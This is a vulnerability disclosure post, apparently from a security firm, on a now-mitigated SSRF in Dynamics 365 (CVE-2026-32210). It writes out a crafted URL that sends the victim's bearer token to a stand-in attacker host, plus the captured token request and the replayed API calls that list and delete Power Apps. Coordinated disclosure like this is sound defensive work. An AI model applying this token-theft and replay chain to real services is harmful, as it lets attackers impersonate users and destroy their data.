12 June 2026 · 5 min read · Research
Hackify discovered a vulnerability in Microsoft Dynamics 365 (online) that let an authenticated user use Server-Side Request Forgery (SSRF) to make the server send an outbound HTTP request to a destination of the attacker’s choosing. That outbound request carried the victim’s OAuth bearer token. With that token, the Power Platform API could then be queried to read, modify and delete Power Apps. Microsoft registered the vulnerability as CVE-2026-32210 and has since fully mitigated it on the service side. Users do not need to take any action.
Microsoft Dynamics 365 (online) is a cloud-based platform for CRM and ERP applications, such as sales, customer service, finance and operations in a single online environment. Under the hood, Dynamics 365 runs on Dataverse, the data platform of Microsoft Power Platform, which is exposed through a Web API. That same Power Platform layer also serves Power Apps, Power Automate and Copilot Studio.
The vulnerability is in the Dataverse Web API endpoint msdyn_UCIClientAuth of Dynamics 365 (online). This endpoint accepts a user-controlled URL in the parameter @EndpointEnum. The backend then performs an HTTP request to that URL on behalf of the server.
Two properties make this serious. First, the SSRF is non-blind. The response body of the external request is returned to the caller and rendered in the Dynamics page, so the attacker sees the response. Second, the bearer token leaks. The outbound, server-side request contains the logged-in user’s OAuth bearer token in the Authorization header. By sending that request to an attacker-controlled endpoint, the token ends up with the attacker.
The vulnerability is present on the Dynamics 365 (online) environment URLs of the form https://<environment-id>.<region>.dynamics.com and appears to occur worldwide, across all regional endpoints. Any authenticated user, from any tenant, can become a victim once they are lured into visiting a crafted URL.
The attacker sets up an HTTPS endpoint that fully logs incoming requests, including the source IP and all request headers. This can be a self-hosted web server or Burp Suite Collaborator. In the examples below, https://attacker.example.com/demo stands in for the attacker endpoint; we leave out the real domain here.
The victim is logged in to their Dynamics 365 environment (for example https://org251c08a7.crm4.dynamics.com) and, while that session is active, visits the following URL:
https://org251c08a7.crm4.dynamics.com/api/data/v9.0/msdyn_UCIClientAuth(EndpointEnum=@EndpointEnum,RequestMethod=@RequestMethod,RequestBody=@RequestBody,RequestHeaders=@RequestHeaders)?@EndpointEnum=%27https%3A%2F%2Fattacker.example.com%2Fdemo%27&@RequestMethod=%27GET%27&@RequestBody=null&@RequestHeaders=null
Here the parameter @EndpointEnum contains the attacker endpoint (https://attacker.example.com/demo), and @RequestMethod is set to GET.
Dynamics performs the server-side request to https://attacker.example.com/demo. The response body of that server is returned and shown in the Dynamics page:
{
"@odata.context": "https://org251c08a7.crm4.dynamics.com/api/data/v9.0/$metadata#Microsoft.Dynamics.CRM.msdyn_UCIClientAuthResponse",
"statuscode": "200",
"response": "This is an HTML response from the attacker.example.com website, provided as a demonstration of the SSRF vulnerability.\n"
}
This confirms that the SSRF is non-blind. The external response comes back to the caller.
On the attacker server, an incoming request appears, originating from a Microsoft IP address, carrying the victim’s Authorization header:
GET /demo HTTP/1.1
From IP: 98.71.111.236
Accept: application/json
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
Host: attacker.example.com
Connection: Keep-Alive
The token is a JWT with the following relevant claims:
aud): https://api.powerplatform.comiss): https://sts.windows.net/<tenant-id>/iat/exp)scp, selection): PowerApps.Apps.Read, PowerApps.Apps.Update, PowerApps.Apps.Delete, PowerApps.AppPermissions.Create, Connectivity.Connectors.Write, CopilotStudio.Copilots.Invoke, PowerVirtualAgents.Conversations.Read and various other Power Platform and AI scopes.The token is also not bound to the client IP or the browser session. As a result, the attacker can reuse it from their own system.
With the stolen token, the attacker queries the Power Platform API:
GET /powerapps/apps?api-version=1 HTTP/2
Host: <environment-id>.environment.api.powerplatform.com
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
The response (HTTP/2 200 OK) contains a list of Power Apps in the victim’s environment. This confirms that the token is valid and reusable and is not tied to a session or IP. The token works against, among others:
https://api.powerplatform.comhttps://<environment-id>.environment.api.powerplatform.comhttps://<tenant-id>.tenant.api.powerplatform.comWith the same token, the attacker can delete a Power App by using the id from the previous response:
DELETE /powerapps/apps/<app-id>?api-version=1 HTTP/2
Host: <environment-id>.environment.api.powerplatform.com
Authorization: Bearer eyJ0eXAiOiJKV1Qi...<truncated>...
The Power App is deleted. Besides deletion, modifying Power Apps is also possible, within the victim’s permission scope, for as long as the token is valid (roughly 70 minutes).
The video below shows the full chain, from triggering the SSRF to deleting a Power App with the stolen token.
Successful exploitation amounts to impersonation of an authenticated user within their permission scope. An attacker who lures a victim into opening a single crafted URL can steal their Power Platform bearer token and use it to enumerate, modify and delete Power Apps. Because the vulnerability appeared to be present on all regional Dynamics 365 (online) endpoints, in principle any authenticated user from any tenant could be a target.
| Metric | Value |
|---|---|
| CVE | CVE-2026-32210 |
| Type | Server-Side Request Forgery (CWE-918), with token leak (CWE-522) and unintended proxy (CWE-441) |
| Affected component | Dataverse Web API (msdyn_UCIClientAuth endpoint); Power Platform REST API |
| Max severity | Critical |
| CVSS score (Microsoft) | 9.3 / 8.1 |
| CVSS vector (Microsoft) | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N/E:U/RL:O/RC:C |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | None |
This vulnerability has been fully mitigated by Microsoft on the service side. Users of Microsoft Dynamics 365 (online) do not need to take any action. Microsoft published the CVE as part of its transparency around cloud vulnerabilities (see Toward greater transparency: Unveiling Cloud Service CVEs).
This vulnerability was reported by Sander Meijering of Hackify. Microsoft recognises contributions from the security community through coordinated vulnerability disclosure; the acknowledgement is included with CVE-2026-32210.
Get in touch with no obligation. We are happy to think along about the best approach for your organisation.
Get in touchOr email us directly at [email protected]